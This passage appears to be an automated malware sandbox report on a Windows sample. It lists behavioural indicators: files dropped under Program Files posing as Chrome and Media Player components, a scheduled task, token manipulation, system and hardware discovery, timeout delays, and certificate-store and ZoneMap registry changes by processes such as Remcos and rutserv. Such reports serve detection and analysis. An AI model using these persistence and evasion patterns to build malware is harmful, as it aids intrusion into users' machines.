N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File opened for modification C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File created C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File created C:\Program Files\Google\Chrome\Application\chrome.exe C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe N/A
File created C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\chrome.exe C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe N/A
File opened for modification C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File opened for modification C:\Program Files\Windows Media Player\graph C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File opened for modification C:\Program Files\Windows Media Player\graph C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
File created C:\Windows\Installer\e5a7e3a.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e5a7e3a.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regedit.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\systeminfo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\50to.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\systeminfo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Remcos\remcos.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\random.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\50.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-O26NE.tmp\jy.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WerFault.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString N/A N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU N/A N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\systeminfo.exe N/A
N/A N/A C:\Windows\SysWOW64\systeminfo.exe N/A
N/A N/A C:\Windows\system32\systeminfo.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\ieframe.dll,-5723 = "The Internet" C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\dllhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\Windows Error Reporting C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\Windows Error Reporting\LastCrashSelfReportTime = "133785014365216070" C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\prnfldr.dll,-8036 = "Printers" C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Uninstall C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\dllhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\NetworkExplorer.dll,-1 = "Network" C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\dllhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\dllhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
